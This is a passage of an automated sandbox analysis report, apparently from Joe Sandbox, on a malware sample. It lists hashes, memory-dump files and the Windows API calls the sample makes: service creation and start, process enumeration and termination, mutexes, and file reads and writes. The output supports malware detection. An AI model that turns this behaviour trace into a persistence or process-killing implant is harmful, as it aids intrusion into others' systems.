                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                            • Opcode ID: f158f3300c98406f93f6878d735f0f9e18101cd3256fe716ff650a87f9cf76e2
                                                                                                                                                                                                            • Instruction ID: f8f99eb120a3361efe80290b3c46567df0733683f53e677aa19ebdb78b873c63
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f158f3300c98406f93f6878d735f0f9e18101cd3256fe716ff650a87f9cf76e2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80715372A00205DBD304DF68FC85B253BB5FB88311F65411AE81AC7EB4E7349AE5CB85
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00163E0B
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                            • Opcode ID: 6067148dacfaaca10ff7886e7f0ae1bcb1f024ef822556e2d9005961edea5d71
                                                                                                                                                                                                            • Instruction ID: 5397fee7e2b920637bbddda1b32943dd6f83130f7f52fca8c039dd05e7acc12c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6067148dacfaaca10ff7886e7f0ae1bcb1f024ef822556e2d9005961edea5d71
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E412372A10314DBD314AF20FC82BA13BB1F7A4710F524219E651E6DB5FB709AE1CB91
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                                                                            • Opcode ID: bfd0829247956772bdd8471333a8a263eff98c5e69947d433bafc4494db83330
                                                                                                                                                                                                            • Instruction ID: 79393dc8eedb8d78068f854f1d3d96820b88099698812382f07167b77e973e2e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: bfd0829247956772bdd8471333a8a263eff98c5e69947d433bafc4494db83330
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D61104755502068BC714AF74FE894253BF0FB55346325452AE04696DB5EB3086E1CB82
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • Sleep.KERNELBASE(000003E8,?,?,001625B4,?,00000708,00000000), ref: 0015139B
                                                                                                                                                                                                              • Part of subcall function 00150920: GetProcAddress.KERNEL32(76850000,00000000), ref: 00150A8A
                                                                                                                                                                                                              • Part of subcall function 00150920: GetProcAddress.KERNEL32(76850000,00000000), ref: 00150B05
                                                                                                                                                                                                              • Part of subcall function 00175370: CloseHandle.KERNEL32(?,00000000,?,001514A0,00000000,001CAF24,00000004,00000001,00000000,?,?,001625B4,?,00000708,00000000), ref: 00175398
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
• Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: AddressProc$CloseHandleSleep
• String ID:
• API String ID: 2193747199-0
• Opcode ID: 4b8893c0aebf7913d2779d052911446eda635433a7387e4f3cc0c068bfaa9c16
• Instruction ID: be10187cfa2a3223c39ba84b81cac73f50791c0244182be0abf5d40a8fa663fa
• Opcode Fuzzy Hash: 4b8893c0aebf7913d2779d052911446eda635433a7387e4f3cc0c068bfaa9c16
• Instruction Fuzzy Hash: E16135B0A00301DFD301AF24FC89B253FB8F799351B454619E85157EB5DB708AE4CB96
APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 00150537
• CreateServiceA.ADVAPI32(00000000,0113E608,0113E608,000F01FF,00000110,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00150596
• ChangeServiceConfig2A.ADVAPI32(00000000,00000001,?), ref: 00150615
• StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 0015062A
• CloseServiceHandle.ADVAPI32(00000000), ref: 001506A7
• OpenServiceA.ADVAPI32(00000000,0113E608,00000010), ref: 001506EB
• StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 0015072D
• CloseServiceHandle.ADVAPI32(00000000), ref: 0015073E
• CloseServiceHandle.ADVAPI32(00000000), ref: 001507A8
Memory Dump Source
• Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: Service$CloseHandle$OpenStart$ChangeConfig2CreateManager
• String ID:
• API String ID: 3525021261-0
• Opcode ID: b8b4f44c17c0bc74e276535aa552d30ab99f5524378763319dc805df7666e641
• Instruction ID: ff063a97b803de87bef5ecaa9953c4dd416f2eb688c892f462b62d6c0cfe8f4a
• Opcode Fuzzy Hash: b8b4f44c17c0bc74e276535aa552d30ab99f5524378763319dc805df7666e641
• Instruction Fuzzy Hash: 4D610131A01314EFD3069F60FC8AB253FB4FB88B11F518605E842AAEB4E77496E5CB45
APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,80000000), ref: 0014B0AA
• EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,?,00000024,?,?,00000000), ref: 0014B15A
• GetLastError.KERNEL32 ref: 0014B17A
• EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,00000000,?,?,?,00000000), ref: 0014B216
• CloseServiceHandle.ADVAPI32(00000000), ref: 0014B41C
Memory Dump Source
• Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: EnumServicesStatus$CloseErrorHandleLastManagerOpenService
• String ID:
• API String ID: 1579346331-0
• Opcode ID: 2f3bef2db8e794f34a2e304e0a6023eb5335007f1e9ab96ad1206d913d936871
• Instruction ID: a0f2b06d3ada50d015d75a2ad3a634f7f9534579d36afb4ae1e502eb1c4fd254
• Opcode Fuzzy Hash: 2f3bef2db8e794f34a2e304e0a6023eb5335007f1e9ab96ad1206d913d936871
• Instruction Fuzzy Hash: 42F143B2A05201EFC304DF64FCC9A6A3BB1FB94350B15421AE54697EB5E730DAE4CB81
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001544A7
• Process32First.KERNEL32(00000000,?), ref: 001545C2
• CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 001547CE
• Module32First.KERNEL32(00000000,00000224), ref: 00154842
• CloseHandle.KERNEL32(00000000,0000000A), ref: 0015495A
• Process32Next.KERNEL32(?,00000128), ref: 001549AD
• CloseHandle.KERNEL32(00000000), ref: 00154A20
Strings
Memory Dump Source
• Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32$Module32Next
• String ID: Eln_
• API String ID: 930127669-3437842203
• Opcode ID: 6d8320fa28f0d2aaff4a95890231cf9e715981bcf6a58efcc56d29fb527cfcdc
• Instruction ID: b7f0551deb72147bec76d60c7128754b5d8e8aecf9e3f1e2f017552fc06afc34
• Opcode Fuzzy Hash: 6d8320fa28f0d2aaff4a95890231cf9e715981bcf6a58efcc56d29fb527cfcdc
• Instruction Fuzzy Hash: 55F16771A00601DFD304CF25FC89A753BB5FB88315B51825AE84A87EB4EB748AE9CF51
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 0014CB20
                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 0014CB5D
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0014CBBD
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0014CC1D
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0014CED4
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0014CF0E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0014CF47
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
• Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: File$CloseCreateHandle$CountReadTickWrite
• String ID:
• API String ID: 3478262135-0
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0014BC90
• Process32First.KERNEL32(00000000,?), ref: 0014BCE3
• OpenProcess.KERNEL32(00000001,00000000,?,?,?,?,?,00000000), ref: 0014BDDD
Memory Dump Source
• Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Similarity
• API ID: CreateFirstOpenProcessProcess32SnapshotToolhelp32
• String ID:
• API String ID: 3397401024-0
APIs
• CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000003,00000000,00000000), ref: 001515C3
• GetFileTime.KERNEL32(00000000,?,?,?), ref: 0015168A
• CloseHandle.KERNEL32(00000000), ref: 001516A7
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00151715
• GetFileSize.KERNEL32(00000000,00000000,2AC18000,FE624E21,00989680,00000000), ref: 00151774
• CloseHandle.KERNEL32(00000000), ref: 00151792
Memory Dump Source
• Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
Similarity
• API ID: File$CloseHandle$CreateSizeTimeUnothrow_t@std@@@__ehfuncinfo$??2@
• String ID:
• API String ID: 3236713533-0
APIs
• OpenProcess.KERNEL32(00000001,00000000,?,?,?,?,?,00000000), ref: 0014BDDD
• TerminateProcess.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 0014BE24
• CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0014BE68
• Process32Next.KERNEL32(00000000,00000128), ref: 0014BF01
• CloseHandle.KERNEL32(00000000), ref: 0014BF2F
Memory Dump Source
• Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
Similarity
• API ID: CloseHandleProcess$NextOpenProcess32Terminate
• String ID:
• API String ID: 3173823348-0
APIs
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,0015E92E,0015CA40,00000000,?), ref: 001754B2
• CreateThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 001754E4
• CloseHandle.KERNEL32(00000000,?,0015E92E,0015CA40,00000000,?), ref: 0017551D
• WaitForSingleObject.KERNEL32(?,000000FF,?,0015E92E,0015CA40,00000000,?), ref: 00175538
• CloseHandle.KERNEL32(?,?,000000FF,?,0015E92E,0015CA40,00000000,?), ref: 0017554B
Memory Dump Source
• Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
Similarity
• API ID: CloseCreateHandle$EventObjectSingleThreadWait
• String ID:
• API String ID: 1404307249-0
APIs
• SetServiceStatus.ADVAPI32(0114A1C8,001B05F8), ref: 001519BA
Strings
Memory Dump Source
• Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ServiceStatus
                                                                                                                                                                                                            • String ID: uRh
                                                                                                                                                                                                            • API String ID: 3969395364-64653548
                                                                                                                                                                                                            • Opcode ID: 2c8cd3d8f5839c0de9f0ebf9f0579bd21492590be531aa7e20a790c2fe380a0f
                                                                                                                                                                                                            • Instruction ID: ebb5af3c7ddb6819f865183d911c89f0e80dbb817fb0338720aabf1215abcb95
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c8cd3d8f5839c0de9f0ebf9f0579bd21492590be531aa7e20a790c2fe380a0f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 523122B2600205EFC349DF64FC8A8213BB9F798356345821AE9468BE70D734D6E5CF51
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0014D11A
                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,?,00005000,?,00000000), ref: 0014D1CC
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 0014D3EE
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 0014D2E9
                                                                                                                                                                                                              • Part of subcall function 0016FCC0: ReleaseMutex.KERNEL32(00150D8E,?,00150D8E,00000128,00000000), ref: 0016FCE9
Similarity
• API ID: CloseFileHandle$CreateMutexReadRelease
• String ID:
• API String ID: 1760212717-0
• Opcode ID: 3d534696c6e2fb3e9828526f86848338571ca5e1be7cbd6b450027837ff8df9b
• Instruction ID: b53dfed79cce73865776e9820254b5fbdbd8f5860e03451f709f7cc4fa9efc8e
• Opcode Fuzzy Hash: 3d534696c6e2fb3e9828526f86848338571ca5e1be7cbd6b450027837ff8df9b
• Instruction Fuzzy Hash: 54B16A71A00600DBCB04AF64FC85B693BB5FBD8711F218156E54597EF1EB709AE4CB82
APIs
• GetProcessHeap.KERNEL32(00000000,00000000,?,?,001503A9,00000000,?), ref: 00156957
• RtlReAllocateHeap.NTDLL(00000000,?,001503A9,00000000), ref: 0015695E
• GetProcessHeap.KERNEL32(00000000,?,?,001503A9,00000000,?), ref: 001569C8
• HeapAlloc.KERNEL32(00000000,?,001503A9,00000000,?), ref: 001569CF
Similarity
• API ID: Heap$Process$AllocAllocate
• String ID:
• API String ID: 1154092256-0
• Opcode ID: 0854f8f39c79355000b5cca1c97547dff543017d721ebea2f690d2947a5c11b6
• Instruction ID: 5fe13a9a5083639da10640ce7b551ac2f636f8185c7407b44799b024cbd98ca6
• Opcode Fuzzy Hash: 0854f8f39c79355000b5cca1c97547dff543017d721ebea2f690d2947a5c11b6
• Instruction Fuzzy Hash: ED21AEB2605204DFD7049F61FE8A9503F78F785310B624619E98693DB4E73199E1CF90
APIs
• GetSystemTime.KERNEL32(0016247D,00000001,?,?,0016247D), ref: 0017518C
• GetTickCount.KERNEL32 ref: 001752BE
Strings
Similarity
• API ID: CountSystemTickTime
• String ID: @AB
• API String ID: 2164215191-841575833
• Opcode ID: 078d7c74786d9cd1011380062dce38b52bf8972c8095f24bab9c3b901f651bbe
• Instruction ID: 82845a754f6ede21e7eb08de9a3fb57ff9c2689891cd13d6accb8e7c52fc6a73
• Opcode Fuzzy Hash: 078d7c74786d9cd1011380062dce38b52bf8972c8095f24bab9c3b901f651bbe
• Instruction Fuzzy Hash: 0451DE72A00A11CFC308DF69FD899253BB6F7987003464116E48AC7EB4EB748AE4CB85

Execution Graph

Execution Coverage: 7.1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 1712
Total number of Limit Nodes: 17
9479->9480 9481 a32f90 2 API calls 9480->9481 9482 a37e73 9481->9482 9483 a41bb0 2 API calls 9482->9483 9484 a37e87 9483->9484 9485 a32f90 2 API calls 9484->9485 9486 a37ef1 9485->9486 9487 a41bb0 2 API calls 9486->9487 9488 a37f05 9487->9488 9489 a32f90 2 API calls 9488->9489 9490 a37f42 9489->9490 9491 a41bb0 2 API calls 9490->9491 9492 a37f62 9491->9492 9493 a32f90 2 API calls 9492->9493 9494 a37fe8 9493->9494 9495 a41bb0 2 API calls 9494->9495 9496 a38004 9495->9496 9497 a32f90 2 API calls 9496->9497 9498 a38093 9497->9498 9499 a41bb0 2 API calls 9498->9499 9500 a380a7 9499->9500 9501 a32f90 2 API calls 9500->9501 9502 a38106 9501->9502 9503 a41bb0 2 API calls 9502->9503 9504 a3818f 9503->9504 9505 a32f90 2 API calls 9504->9505 9506 a381d1 9505->9506 9507 a41bb0 2 API calls 9506->9507 9508 a381eb 9507->9508 9509 a32f90 2 API calls 9508->9509 9510 a38230 9509->9510 9511 a41bb0 2 API calls 9510->9511 9512 a38268 9511->9512 9513 a41bb0 2 API calls 9512->9513 9514 a382b6 9513->9514 9696 a42eb0 GetProcessHeap RtlFreeHeap 9514->9696 9518 a3839b 9519 a32f90 2 API calls 9518->9519 9520 a383c0 GetEnvironmentVariableA 9519->9520 9521 a41bb0 2 API calls 9520->9521 9522 a383f9 CreateMutexA 9521->9522 9524 a38480 CreateMutexA CreateMutexA 9522->9524 9526 a38521 9524->9526 9527 a38587 GetTickCount 9526->9527 9528 a3868b 9526->9528 9530 a385a5 9527->9530 9705 a45200 9528->9705 9532 a32f90 2 API calls 9530->9532 9531 a386a4 GetCommandLineA 9533 a386cb 9531->9533 9535 a385bd 9532->9535 9534 a32f90 2 API calls 9533->9534 9536 a3874d 9534->9536 9537 a41bb0 2 API calls 9535->9537 9539 a41bb0 2 API calls 9536->9539 9538 a38622 9537->9538 9538->9528 9540 a3878c 9539->9540 9541 a39235 GetCommandLineA 9540->9541 9543 a32f90 2 API calls 9540->9543 9858 a5b990 9541->9858 9545 a387dd 9543->9545 9546 a41bb0 2 API calls 9545->9546 9549 a38812 9546->9549 9547 a392f3 9861 a3d500 lstrlen 9547->9861 9548 a39271 9548->9547 9550 a38842 9549->9550 9552 a32800 ExitProcess 9549->9552 9555 a32f90 2 
